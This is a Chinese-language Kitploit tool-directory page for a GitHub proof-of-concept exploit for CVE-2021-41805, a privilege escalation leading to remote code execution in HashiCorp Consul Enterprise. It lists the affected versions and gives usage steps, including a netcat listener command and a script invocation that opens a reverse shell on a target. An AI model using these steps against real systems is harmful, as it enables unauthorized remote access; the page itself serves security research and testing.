Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41805 — CVE-2021-41805 的概念验证,该漏洞存在于 HashiCorp Consul Enterprise 中,允许在权限提升的情况下实现远程代码执行(RCE)。 | Kitploit
工具/GitHubGitHub/acfirthh/cve-2021-41805
权限提升漏洞分析漏洞利用渗透测试云安全学习与教育远程访问工具
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

CVE-2021-41805 的概念验证,该漏洞存在于 HashiCorp Consul Enterprise 中,允许在权限提升的情况下实现远程代码执行(RCE)。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] 法律免责声明: 此工具严格仅用于教育目的! 在未事先获得双方同意的情况下使用此工具攻击目标是非法的。 使用此工具时,用户有责任遵守所有适用法律。 此工具的开发者不承担任何责任,也不对因使用本程序而导致的任何滥用或损害负责。

关于该 CVE

一个 ACL 令牌(具有默认的 operator:write 权限)在一个命名空间中可用于在另一个命名空间中进行意外的权限提升。此漏洞可被滥用以获得提升权限的远程代码执行(RCE)。

受影响版本

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

安装并运行脚本

  • 首先,克隆仓库:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • 切换到克隆的仓库目录:
    cd CVE-2021-41805
  • 启动一个简单的监听器:
    nc -nvlp <LISTENER_PORT>
  • 运行脚本:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [可选: -t <ACL token> -v (详细输出) -s (使用 SSL)]

反向 Shell

预期输出

使用基本参数运行漏洞利用:-r [目标IP]、-rp [目标端口]、-l [监听IP]、-lp [监听端口](-t [ACL令牌]、-s [使用SSL])将输出类似以下内容:

root@kitploit:~
[*] PUT 请求成功。请检查你的监听器...

使用基本参数加上 -v [详细输出] 运行漏洞利用将输出详细内容: 详细输出

如果运行漏洞利用时发生错误且指定了 -v 参数,输出将类似于: 带错误的详细输出

下载工具